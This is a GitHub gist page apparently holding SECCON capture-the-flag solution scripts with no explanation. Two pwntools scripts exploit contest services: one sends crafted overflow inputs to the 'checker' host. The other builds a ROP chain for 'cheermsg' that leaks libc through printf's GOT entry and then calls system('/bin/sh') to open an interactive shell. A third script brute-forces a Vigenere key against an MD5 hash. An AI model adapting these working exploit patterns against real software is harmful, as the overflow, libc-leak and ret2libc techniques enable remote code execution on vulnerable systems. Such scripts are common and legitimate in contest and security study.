Create a gist now

Instantly share code, notes, and snippets.

What would you like to do?
writeups
# coding:utf-8
from pwn import *
r = remote("checker.pwn.seccon.jp", 14726)
base = 377
print r.recvuntil("NAME : ")
r.sendline("nao")
print r.recvuntil(">> ")
r.sendline("A" * (base + 6))
print r.recvuntil(">> ")
r.sendline("A" * (base + 5))
print r.recvuntil(">> ")
r.sendline("A" * (base + 4))
print r.recvuntil(">> ")
r.sendline("A" * (base + 3))
print r.recvuntil(">> ")
r.sendline("A" * (base + 2))
print r.recvuntil(">> ")
r.sendline("A" * (base - 1) + "\xc0\x10\x60")
print r.recvuntil(">> ")
r.sendline("yes")
print r.recvuntil("FLAG : ")
r.sendline("A" * 300)
print r.recvline()
print r.recvline()
# coding:utf-8
from socket import *
import time
import struct
import sys
import time
from pwn import *
host = "cheermsg.pwn.seccon.jp"
port = 30527
r = remote(host, port)
binsh = 0x16084c
system = 0x00040310
printf_plt = 0x8048430
printf_got = 0x804a010
printf_libc = 0x0004d410
main = 0x080485ca
rop = ""
rop += p32(printf_plt)
rop += p32(main)
rop += p32(printf_got)
print r.recvuntil("Message Length >> ")
r.sendline("-150")
print r.recvuntil("Name >> ")
r.sendline(rop)
print r.recvuntil("Message : \n")
libc_base = u32(r.recv(4)) - printf_libc
print r.recvuntil("Message Length >> ")
r.sendline("-150")
print r.recvuntil("Name >> ")
rop = ""
rop += p32(libc_base + system)
rop += p32(libc_base + binsh) # dummy
rop += p32(libc_base + binsh)
r.sendline(rop)
print r.recvuntil("Message : \n")
r.interactive()
# coding:utf-8
import hashlib
length = 28
f = open("table").read().rstrip("\n").split("\n")
table = [[x for x in y] for y in f]
def getval(key, cipher):
for i,x in enumerate(table[0]):
if x == key:
col = i
for i in range(length):
if table[i][col] == cipher:
wei = i
return table[0][wei]
if __name__ == '__main__':
s = "VIGENERE"
c ="LMIG}RPEDOEE"
c2 = "WKJIQIWKJWMN"
c3 = "DTSR}TFVUFWY"
c4 ="OCBAJBQ"
hash_ = "f528a6ab914c1ecf856a1d93103948fe"
print(''.join([getval(s[i], c[i]) for i in range(len(s))]))
al = table[0]
for i in range(28):
for j in range(28):
for k in range(28):
for l in range(28):
val = ''.join([al[i],al[j],al[k],al[l]])
key = s + val
ret1 = ''.join([getval(key[i], c[i]) for i in range(len(c))])
ret2 = ''.join([getval(key[i], c2[i]) for i in range(len(c2))])
ret3 = ''.join([getval(key[i], c3[i]) for i in range(len(c3))])
ret4 = ''.join([getval(key[i], c4[i]) for i in range(len(c4))])
ret = ''.join([ret1, ret2, ret3, ret4])
if hashlib.md5(ret.encode('utf-8')).hexdigest() == hash_:
print(ret)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment